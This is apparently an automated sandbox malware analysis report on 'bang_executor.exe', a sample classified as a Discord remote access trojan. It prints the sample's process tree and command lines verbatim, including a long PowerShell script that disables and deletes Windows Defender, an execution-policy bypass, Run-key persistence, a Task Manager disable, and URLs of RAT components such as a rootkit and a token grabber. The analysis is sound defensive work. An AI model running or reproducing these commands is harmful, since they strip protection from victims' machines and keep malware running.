Windows Analysis Report
bang_executor.exe

Overview

General Information

Sample name: bang_executor.exe
Analysis ID: 1393035
MD5: 043e699dbf3d88b6cca5fbe64229ba27
SHA1: 50661d32315985eab2a70f1d1f6435b9563ca237
SHA256: 2c995d090bde52ca3355c7dba1694b1c8678f52ea3d6d5de981c5ab0372ab747
Tags: exe
Infos:

Detection

Dicrord Rat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Yara detected Dicrord Rat
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Adds extensions / path to Windows Defender exclusion list
Bypasses PowerShell execution policy
Contains functionality to disable the Task Manager (.Net Source)
Disable Task Manager(disabletaskmgr)
Disables Windows Defender (via service or powershell)
Disables the Windows task manager (taskmgr)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious PowerShell Parameter Substring
Uses cmd line tools excessively to alter registry or file data
Very long command line found
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Powershell Defender Exclusion
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • bang_executor.exe (PID: 2520 cmdline: C:\Users\user\Desktop\bang_executor.exe MD5: 043E699DBF3D88B6CCA5FBE64229BA27)
    • cmd.exe (PID: 2284 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\bang.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • bang_executor.exe (PID: 1236 cmdline: bang_executor.exe MD5: E1EAD094E52097B884389A8064B15E2B)
        • WerFault.exe (PID: 7948 cmdline: C:\Windows\system32\WerFault.exe -u -p 1236 -s 2324 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • executer.exe (PID: 2228 cmdline: executer.exe MD5: 88E22186F196CC0E1E2D500EEAC57337)
        • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7480 cmdline: "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" > test.ps1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7552 cmdline: "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1; MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7696 cmdline: powershell.exe -ep bypass .\test.ps1; MD5: 04029E121A0CFA5991749937DD22A1D9)
            • WmiPrvSE.exe (PID: 8064 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6588 cmdline: C:\Windows\system32\cmd.exe /K instaling.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7380 cmdline: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • reg.exe (PID: 7500 cmdline: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • bang_executor.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" MD5: E1EAD094E52097B884389A8064B15E2B)
            • WerFault.exe (PID: 7484 cmdline: C:\Windows\system32\WerFault.exe -u -p 7356 -s 2296 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • cmd.exe (PID: 7184 cmdline: C:\Windows\system32\cmd.exe /K mgr.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7392 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • cmd.exe (PID: 7236 cmdline: C:\Windows\system32\cmd.exe /K microsoft.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7440 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • bang_executor.exe (PID: 7572 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" MD5: E1EAD094E52097B884389A8064B15E2B)
          • WerFault.exe (PID: 7972 cmdline: C:\Windows\system32\WerFault.exe -u -p 7572 -s 2328 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • bang_executor.exe (PID: 7968 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" MD5: E1EAD094E52097B884389A8064B15E2B)
    • WerFault.exe (PID: 7788 cmdline: C:\Windows\system32\WerFault.exe -u -p 7968 -s 2324 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe | JoeSecurity_DicrordRat | Yara detected Dicrord Rat | Joe Security |
00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_DicrordRat | Yara detected Dicrord Rat | Joe Security |
Process Memory Space: bang_executor.exe PID: 1236 | JoeSecurity_DicrordRat | Yara detected Dicrord Rat | Joe Security |
3.0.bang_executor.exe.230771e0000.0.unpack | JoeSecurity_DicrordRat | Yara detected Dicrord Rat | Joe Security |

          System Summary

          Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7440, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bang_executor
          Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Path "HKLM:\S
          Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: powershell.exe -ep bypass .\test.ps1;, CommandLine: powershell.exe -ep bypass .\test.ps1;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7552, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ep bypass .\test.ps1;, ProcessId: 7696, ProcessName: powershell.exe
          Source: Process started | Author: frack113 | Data: Command: powershell.exe -ep bypass .\test.ps1;, CommandLine: powershell.exe -ep bypass .\test.ps1;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7552, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ep bypass .\test.ps1;, ProcessId: 7696, ProcessName: powershell.exe
          Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7440, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bang_executor
          Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f, CommandLine: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K microsoft.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7236, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f, ProcessId: 7440, ProcessName: reg.exe
          Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f, CommandLine: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K microsoft.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7236, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f, ProcessId: 7440, ProcessName: reg.exe
          Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -ep bypass .\test.ps1;, CommandLine: powershell.exe -ep bypass .\test.ps1;, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7552, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ep bypass .\test.ps1;, ProcessId: 7696, ProcessName: powershell.exe
          No Snort rule has matched

          AV Detection

          Source: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/unrootkit.d | Avira URL Cloud: Label: malware
          Source: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Webcam.dll | Avira URL Cloud: Label: malware
          Source: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordSte | Avira URL Cloud: Label: malware
          Source: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/rootkit.dll | Avira URL Cloud: Label: malware
          Source: https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/Token%20gra | Avira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe | ReversingLabs: Detection: 47%
          Source: Yara match | File source: 3.0.bang_executor.exe.230771e0000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000003.00000000.1613544617.00000230771E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: bang_executor.exe PID: 1236, type: MEMORYSTR
          Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe, type: DROPPED
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe | Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe | Joe Sandbox ML: detected
          Source: bang_executor.exe | Joe Sandbox ML: detected
          Source: bang_executor.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknown | HTTPS traffic detected: 162.159.136.234:443 -> 192.168.2.4:49729 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 162.159.136.234:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 162.159.136.234:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 162.159.136.234:443 -> 192.168.2.4:49751 version: TLS 1.2
          Source: bang_executor.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbg source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbC source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB4% source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbR source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdbx source: WERB598.tmp.dmp.26.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb^ source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: b77a5c561934e089\mscorlib.pdb source: bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb" source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB@ source: bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.Core.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: System.Web.Extensions.pdbMZ source: WERB598.tmp.dmp.26.dr
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbE source: bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb*' source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Web.Extensions.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B4F000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.00000135261E8000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb& source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb&$ source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: bang_executor.PDB` source: bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDBpF source: bang_executor.exe, 00000003.00000002.1774187297.000000D1E65F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Web.Extensions.pdb??\p= source: WERF485.tmp.dmp.34.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb\ source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdbL source: bang_executor.exe, 0000001C.00000002.1780864823.000001352626C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: b77a5c561934e089\mscorlib.pdb, source: bang_executor.exe, 00000013.00000002.1765074697.000000D6E83F1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
          Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079BB4000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 0000001C.00000002.1780864823.000001352626C000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079BB4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: bang_executor.exe
          Source: Binary string: C:\Windows\System.pdbpdbtem.pdb/ source: bang_executor.exe, 0000001C.00000002.1780864823.0000013526228000.00000004.00000020.00020000.00000000.sdmp
